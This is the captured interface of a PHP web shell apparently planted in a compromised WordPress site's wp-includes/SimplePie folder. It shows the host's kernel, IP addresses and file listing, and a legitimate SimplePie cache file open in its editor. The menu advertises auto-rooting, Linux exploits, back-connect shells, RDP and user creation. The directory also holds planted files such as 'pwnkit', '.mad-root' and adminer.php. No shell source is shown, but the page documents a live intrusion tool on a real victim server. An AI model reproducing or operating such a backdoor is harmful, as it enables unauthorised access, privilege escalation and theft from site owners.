Linux webm009.cluster129.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.129.20.9 | : 216.73.217.71
Cant Read [ /etc/named.conf ]
5.4.45
scentii
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
scentii /
www /
wp-includes /
SimplePie /
src /
Cache /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Base.php
1.83
KB
-rw-r--r--
BaseDataCache.php
3.5
KB
-rw-r--r--
CallableNameFilter.php
1.48
KB
-rw-r--r--
DB.php
3.62
KB
-rw-r--r--
DataCache.php
2.73
KB
-rw-r--r--
File.php
2.91
KB
-rw-r--r--
Memcache.php
3.63
KB
-rw-r--r--
Memcached.php
3.74
KB
-rw-r--r--
MySQL.php
13.38
KB
-rw-r--r--
NameFilter.php
1.15
KB
-rw-r--r--
Psr16.php
3.18
KB
-rw-r--r--
Redis.php
4.2
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CallableNameFilter.php
<?php // SPDX-FileCopyrightText: 2004-2023 Ryan Parman, Sam Sneddon, Ryan McCue // SPDX-License-Identifier: BSD-3-Clause declare(strict_types=1); namespace SimplePie\Cache; /** * Creating a cache filename with callables */ final class CallableNameFilter implements NameFilter { /** * @var callable(string): string */ private $callable; /** * @param callable(string): string $callable */ public function __construct(callable $callable) { $this->callable = $callable; } /** * Method to create cache filename with. * * The returning name MUST follow the rules for keys in PSR-16. * * @link https://www.php-fig.org/psr/psr-16/ * * The returning name MUST be a string of at least one character * that uniquely identifies a cached item, MUST only contain the * characters A-Z, a-z, 0-9, _, and . in any order in UTF-8 encoding * and MUST not longer then 64 characters. The following characters * are reserved for future extensions and MUST NOT be used: {}()/\@: * * A provided implementing library MAY support additional characters * and encodings or longer lengths, but MUST support at least that * minimum. * * @param string $name The name for the cache will be most likely an url with query string * * @return string the new cache name */ public function filter(string $name): string { return call_user_func($this->callable, $name); } }
Close